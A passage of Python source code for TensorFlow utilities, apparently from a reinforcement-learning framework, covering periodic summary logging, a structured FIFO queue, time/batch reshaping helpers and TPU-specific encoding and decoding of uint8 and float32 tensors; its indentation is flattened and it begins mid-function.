"""Perform single round of logging."""
logging_time = timeit.default_timer()
step_cnt = self.step_cnt.read_value()
values = self.ready_values.read_value().numpy()
if values[0] == -1:
return
assert len(values) == len(
self.log_keys
), 'Mismatch between number of keys and values to log: %r vs %r' % (
values, self.log_keys)
if self.summary_writer:
self.summary_writer.set_as_default()
tf.summary.experimental.set_step(step_cnt.numpy())
if self.logging_callback:
self.logging_callback()
for key, value in zip(self.log_keys, values):
tf.summary.scalar(key, value)
dt = logging_time - self.last_log_time
df = tf.cast(step_cnt - self.last_log_step, tf.float32)
tf.summary.scalar('speed/steps_per_sec', df / dt)
self.last_log_time, self.last_log_step = logging_time, step_cnt
def _logging_loop(self):
while not self.terminator.is_set():
last_log_time = self.last_log_time
self._log()
elapsed = timeit.default_timer() - last_log_time
self.period = min(self.period_factor * self.period,
self.max_period)
self.terminator.wait(timeout=max(0, self.period - elapsed))
class StructuredFIFOQueue(tf.queue.FIFOQueue):
"""A tf.queue.FIFOQueue that supports nests and tf.TensorSpec."""
def __init__(self,
capacity,
specs,
shared_name=None,
name='structured_fifo_queue'):
self._specs = specs
self._flattened_specs = tf.nest.flatten(specs)
dtypes = [ts.dtype for ts in self._flattened_specs]
shapes = [ts.shape for ts in self._flattened_specs]
super(StructuredFIFOQueue, self).__init__(capacity, dtypes, shapes)
def dequeue(self, name=None):
result = super(StructuredFIFOQueue, self).dequeue(name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def dequeue_many(self, batch_size, name=None):
result = super(StructuredFIFOQueue, self).dequeue_many(
batch_size, name=name)
return tf.nest.pack_sequence_as(self._specs, result)
def enqueue(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue(
tf.nest.flatten(vals), name=name)
def enqueue_many(self, vals, name=None):
tf.nest.assert_same_structure(vals, self._specs)
return super(StructuredFIFOQueue, self).enqueue_many(
tf.nest.flatten(vals), name=name)
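# Hedged usage sketch (hypothetical specs): the queue round-trips a nest,
# so dequeue() returns the same {'obs', 'done'} structure that was enqueued.
def _example_structured_queue():
    specs = {'obs': tf.TensorSpec([2], tf.float32),
             'done': tf.TensorSpec([], tf.bool)}
    q = StructuredFIFOQueue(capacity=16, specs=specs)
    q.enqueue({'obs': tf.zeros([2]), 'done': tf.constant(False)})
    return q.dequeue()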
def batch_apply(fn, inputs):
"""Folds time into the batch dimension, runs fn() and unfolds the result.
Args:
fn: Function that takes as input the n tensors of the tf.nest structure,
with shape [time*batch, <remaining shape>], and returns a tf.nest
structure of batched tensors.
inputs: tf.nest structure of n [time, batch, <remaining shape>] tensors.
Returns:
tf.nest structure of [time, batch, <fn output shape>]. Structure is
determined by the output of fn.
"""
time_to_batch_fn = lambda t: tf.reshape(t, [-1] + t.shape[2:].as_list())
batched = tf.nest.map_structure(time_to_batch_fn, inputs)
output = fn(*batched)
prefix = [int(tf.nest.flatten(inputs)[0].shape[0]), -1]
batch_to_time_fn = lambda t: tf.reshape(t, prefix + t.shape[1:].as_list())
return tf.nest.map_structure(batch_to_time_fn, output)
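# Example (hedged): applying a per-example function over [time, batch, ...]
# tensors by folding time into batch; layer and shapes are illustrative.
def _example_batch_apply():
  x = tf.zeros([10, 4, 8])  # [time=10, batch=4, features=8]
  dense = tf.keras.layers.Dense(16)
  # dense sees a [40, 8] input; the result is unfolded back to [10, 4, 16].
  return batch_apply(dense, (x,))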
def make_time_major(x):
"""Transposes the batch and time dimensions of a nest of Tensors.
If an input tensor has rank < 2 it returns the original tensor. Retains as
much of the static shape information as possible.
Args:
x: A nest of Tensors.
Returns:
x transposed along the first two dimensions.
"""
def transpose(t):
t_static_shape = t.shape
if t_static_shape.rank is not None and t_static_shape.rank < 2:
return t
t_rank = tf.rank(t)
t_t = tf.transpose(t, tf.concat(([1, 0], tf.range(2, t_rank)), axis=0))
t_t.set_shape(
tf.TensorShape([t_static_shape[1],
t_static_shape[0]]).concatenate(t_static_shape[2:]))
return t_t
return tf.nest.map_structure(
lambda t: tf.xla.experimental.compile(transpose, [t])[0], x)
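# Example (hedged): make_time_major swaps the leading two dimensions, so the
# same call also converts time-major back to batch-major. Wrapped in a
# tf.function since tf.xla.experimental.compile expects a graph context.
@tf.function
def _example_make_time_major():
  x = tf.zeros([4, 10, 8])  # [batch=4, time=10, features=8]
  return make_time_major(x)  # -> shape [10, 4, 8]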
class TPUEncodedUInt8Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedUInt8."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.uint32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedUInt8(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedUInt8
class TPUEncodedUInt8(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedUInt8Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedUInt8, lambda value, *unused_args, **unused_kwargs: value.encoded)
class TPUEncodedF32Spec(tf.TypeSpec):
"""Type specification for composite tensor TPUEncodedF32Spec."""
def __init__(self, encoded_shape, original_shape):
self._value_specs = (tf.TensorSpec(encoded_shape, tf.float32),)
self.original_shape = original_shape
@property
def _component_specs(self):
return self._value_specs
def _to_components(self, value):
return (value.encoded,)
def _from_components(self, components):
return TPUEncodedF32(components[0], self.original_shape)
def _serialize(self):
return self._value_specs[0].shape, self.original_shape
def _to_legacy_output_types(self):
return self._value_specs[0].dtype
def _to_legacy_output_shapes(self):
return self._value_specs[0].shape
@property
def value_type(self):
return TPUEncodedF32
class TPUEncodedF32(composite_tensor.CompositeTensor):
def __init__(self, encoded, shape):
self.encoded = encoded
self.original_shape = shape
self._spec = TPUEncodedF32Spec(encoded.shape, tf.TensorShape(shape))
@property
def _type_spec(self):
return self._spec
tensor_conversion_registry.register_tensor_conversion_function(
TPUEncodedF32, lambda value, *unused_args, **unused_kwargs: value.encoded)
def num_divisible(v, m):
"""Returns how many elements of `v` are divisible by `m`."""
return sum(1 for x in v if x % m == 0)
def tpu_encode(ts):
"""Encodes a nest of Tensors in a suitable way for TPUs.
TPUs do not support tf.uint8, tf.uint16 and other data types. Furthermore,
the speed of transfer and device reshapes depend on the shape of the data.
This function tries to optimize the data encoding for a number of use cases.
Should be used on CPU before sending data to TPU and in conjunction with
`tpu_decode` after the data is transferred.
Args:
ts: A tf.nest of Tensors.
Returns:
A tf.nest of encoded Tensors.
"""
def visit(t):
num_elements = t.shape.num_elements()
# We need a multiple of 128 elements: encoding reduces the number of
# elements by a factor of 4 (packing uint8s into uint32s), and the first
# thing decode does is reshape with a 32 minor-most dimension.
if (t.dtype == tf.uint8 and num_elements is not None and
num_elements % 128 == 0):
# For details of these transformations, see b/137182262.
x = tf.xla.experimental.compile(
lambda x: tf.transpose(x, list(range(1, t.shape.rank)) + [0]), [t])[0]
x = tf.reshape(x, [-1, 4])
x = tf.bitcast(x, tf.uint32)
x = tf.reshape(x, [-1])
return TPUEncodedUInt8(x, t.shape)
elif t.dtype == tf.uint8:
logging.warning('Inefficient uint8 transfer with shape: %s', t.shape)
return tf.cast(t, tf.bfloat16)
elif t.dtype == tf.uint16:
return tf.cast(t, tf.int32)
elif (t.dtype == tf.float32 and t.shape.rank > 1 and not
(num_divisible(t.shape.dims, 128) >= 1 and
num_divisible(t.shape.dims, 8) >= 2)):
x = tf.reshape(t, [-1])
return TPUEncodedF32(x, t.shape)
else:
return t
return tf.nest.map_structure(visit, ts)
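# Example (hedged): a uint8 tensor whose element count is a multiple of 128
# takes the packed path and comes back as a TPUEncodedUInt8 composite tensor.
# Wrapped in a tf.function since the packed path uses tf.xla.experimental.compile.
@tf.function
def _example_tpu_encode():
  frames = tf.zeros([8, 84, 84, 4], tf.uint8)  # 225792 elements, 128-divisible
  return tpu_encode(frames)  # TPUEncodedUInt8 wrapping a flat uint32 tensor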
def tpu_decode(ts, structure=None):
"""Decodes a nest of Tensors encoded with tpu_encode.
Args:
ts: A nest of Tensors or TPUEncodedUInt8 composite tensors.
structure: If not None, a nest of Tensors or TPUEncodedUInt8 composite
tensors (possibly within PerReplica's) that are only used to recreate the
structure of `ts` which then should be a list without composite tensors.
Returns:
A nest of decoded tensors packed as `structure` if available, otherwise
packed as `ts`.
"""
def visit(t, s):
s = s.values[0] if isinstance(s, values_lib.PerReplica) else s
if isinstance(s, TPUEncodedUInt8):
x = t.encoded if isinstance(t, TPUEncodedUInt8) else t
x = tf.reshape(x, [-1, 32, 1])
x = tf.broadcast_to(x, x.shape[:-1] + [4])
x = tf.reshape(x, [-1, 128])
x = tf.bitwise.bitwise_and(x, [0xFF, 0xFF00, 0xFF0000, 0xFF000000] * 32)
x = tf.bitwise.right_shift(x, [0, 8, 16, 24] * 32)
rank = s.original_shape.rank
perm = [rank - 1] + list(range(rank - 1))
inverted_shape = np.array(s.original_shape)[np.argsort(perm)]
x = tf.reshape(x, inverted_shape)
x = tf.transpose(x, perm)
return x
elif isinstance(s, TPUEncodedF32):
x = t.encoded if isinstance(t, TPUEncodedF32) else t
x = tf.reshape(x, s.original_shape)
return x
else:
return t
return tf.nest.map_structure(visit, ts, structure or ts)
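# Example (hedged): an encode/decode round trip restores the original shape;
# note the decoded values come back as uint32 (the bitwise ops keep uint32),
# so a final tf.cast may be needed downstream.
@tf.function
def _example_tpu_round_trip():
  frames = tf.reshape(tf.cast(tf.range(256) % 200, tf.uint8), [2, 128])
  decoded = tpu_decode(tpu_encode(frames))  # shape [2, 128], dtype uint32
  return tf.cast(decoded, tf.uint8)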
def split_structure(structure, prefix_length):
"""Splits in two a tf.nest structure of tensors along the first axis."""
flattened = tf.nest.flatten(structure)
split = [tf.split(x, [prefix_length, tf.shape(x)[0] - prefix_length])
for x in flattened]
flattened_prefix = [pair[0] for pair in split]
flattened_suffix = [pair[1] for pair in split]
return (tf.nest.pack_sequence_as(structure, flattened_prefix),
tf.nest.pack_sequence_as(structure, flattened_suffix))
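# Example (hedged): splitting a nested batch along axis 0, e.g. to separate a
# fixed-size prefix from the remainder; field names are illustrative.
def _example_split_structure():
  batch = {'obs': tf.zeros([6, 3]), 'reward': tf.zeros([6])}
  prefix, suffix = split_structure(batch, 2)
  return prefix, suffix  # prefix['obs']: [2, 3]; suffix['obs']: [4, 3]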
@contextlib.contextmanager
def nullcontext(*args, **kwds):
del args # unused
del kwds # unused
yield None
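# Note (hedged): Python 3.7+ provides contextlib.nullcontext; this shim mirrors
# it while also ignoring any arguments, which allows call sites like
# `with (strategy.scope() if strategy else nullcontext()):` (illustrative).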
|